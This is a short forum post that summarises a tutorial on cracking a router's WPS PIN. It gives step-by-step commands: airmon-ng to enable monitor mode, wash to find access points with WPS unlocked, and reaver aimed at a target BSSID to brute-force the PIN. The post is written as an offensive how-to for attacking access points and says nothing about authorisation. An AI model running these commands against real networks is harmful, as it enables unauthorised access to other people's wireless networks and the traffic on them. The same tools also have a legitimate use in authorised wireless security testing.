How to Hack the WPS PIN with Reaver

Computer security issues, hacker & phreak news, conferences, Q&A, etc.

Computer chat, coding, reviews, hardware or software...

Share your infos!
User avatar
Stevyn
SysOp
Posts:1776
Joined:Mon Nov 09, 2009 10:03 am
Location:Japan
Contact:
How to Hack the WPS PIN with Reaver

Post by Stevyn » Thu May 23, 2019 1:13 pm

How to Hack the WPS PIN with Reaver by Master OTW's Hacker Training Camp

https://www.hackers-arise.com/single-po ... ith-Reaver

this is used to guess the 8 digit pin code that can setup the router.

tool specially designed to brute-force the WPS PIN named Reaver , built into Kali and other Linux security distributions,

Step #1:Reconnaissance for WPS Enabled AP's
locate AP's that have WPS enabled and not locked. Use recon tool called wash with Reaver.
Put your wireless interface into monitor (promiscuous) mode with airmon-ng.

Code: Select all

airmon-ng start wlan0

Code: Select all

wash -i <interface>
if you wireless network device is wlan0, airmon-ng will likely change its name to something like wlan0mon (make certain to use the actual monitor device name available near the bottom of airmon-ng output).

Step #2 Cracking the PIN with Reaver

Code: Select all

reaver  -i wlan0mon -b <BSSID> -S -v
  • wlan0mon is the name of our wireless device in monitor mode
    BSSID is the MAC address of the AP we are attacking
Contact me directly: Ironfeatherbooks (@) gmail.com

Image

Post Reply